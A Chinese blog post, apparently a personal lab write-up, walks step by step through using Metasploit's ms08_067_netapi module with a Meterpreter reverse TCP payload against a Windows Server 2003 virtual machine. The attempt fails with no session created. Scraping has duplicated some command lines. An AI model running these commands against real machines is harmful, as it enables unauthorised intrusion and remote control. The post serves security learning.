Metasploit渗透复现MS08-067漏洞

2022-06-14 16:02:32 浏览数 (2)

本文说明

这篇文章也是我在别的博客看到的,一想自己的Kali已经尘封多年了,所以便有了想试试的冲动,但是本次测试并没有成功,没有成功的原因可能是漏洞已经被填了,也有可能是我操作的过程不对。

还有最最最重要的一条,本次测试是在绝对安全的环境下(由虚拟机构建的局域网环境)完成测试的。这不是教程啊,可掰(别)跟着瞎xiao(学)啊

试验环境

  • 虚拟局域网,网关:192.168.101.1
  • Kali Linux 2020.01,ip:192.168.101.255
  • Windows Server 2003,ip:192.168.101.229

实验过程

1.先获取自己的ip地址

代码语言:txt复制
kali@kali:~$ sudo ifconfig
sudo ifconfigsudo ifconfig
代码语言:txt复制
Microsoft Windows [版本 5.2.3790]
(C) 版权所有 1985-2003 Microsoft Corp.

C:Documents and SettingsAdministrator>ipconfig
ipconfigipconfig

2.获取到了以后我们互相ping一下,确认是否可以ping通

代码语言:txt复制
kali@kali:~$ sudo ping 192.168.101.229
sudo ping 192.168.101.229sudo ping 192.168.101.229
代码语言:txt复制
ping 192.168.101.255
ping 192.168.101.255ping 192.168.101.255

3.ok,都已经ping通了,我们初始化一下数据库

代码语言:txt复制
kali@kali:~$ sudo service postgresql start
kali@kali:~$ sudo msfdb init
初始化数据库初始化数据库

4.接下来我们进入msf的终端

代码语言:txt复制
kali@kali:~$ sudo msfconsole
sudo msfconsolesudo msfconsole

5.进去了之后我们搜索一下MS08-067模块

代码语言:txt复制
msf5 > search ms08-067
search ms08-067search ms08-067

6.搜索到了,我们看一下序号,然后使用它

代码语言:txt复制
msf5 > use 0
use 0use 0

7.好了,已经使用了,我们列出一下它的载荷

代码语言:txt复制
msf5 exploit(windows/smb/ms08_067_netapi) > show payloads
设置相关信息设置相关信息

8.我们来设置一下我们要使用的载荷,然后设置相关信息

代码语言:txt复制
msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.101.229
rhost => 192.168.101.229
msf5 exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.101.255
lhost => 192.168.101.255
msf5 exploit(windows/smb/ms08_067_netapi) > set target 34
target => 34
msf5 exploit(windows/smb/ms08_067_netapi) > show options
使用载荷使用载荷

9.既然都设置好了,那么我们就可以开始攻击了。

代码语言:txt复制
msf5 exploit(windows/smb/ms08_067_netapi) > exploit
开始攻击开始攻击

实验结果

然后我们来看看结果,这里的话我们可以看出no session was created这就证明我们这次攻击是不成功的。虽然说有些小失落,但是更多的开心。我的这个Windows Server 2003镜像是在网络下载的,可以看出来这个镜像的相关漏洞已经被修复了,倘若没有修复漏洞的话,那么这个镜像流入市场,会带来多大的损失我们可想而知。

代码语言:txt复制
msf5 exploit(windows/smb/ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 192.168.101.255:4444 
[*] 192.168.101.229:445 - Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.

0 人点赞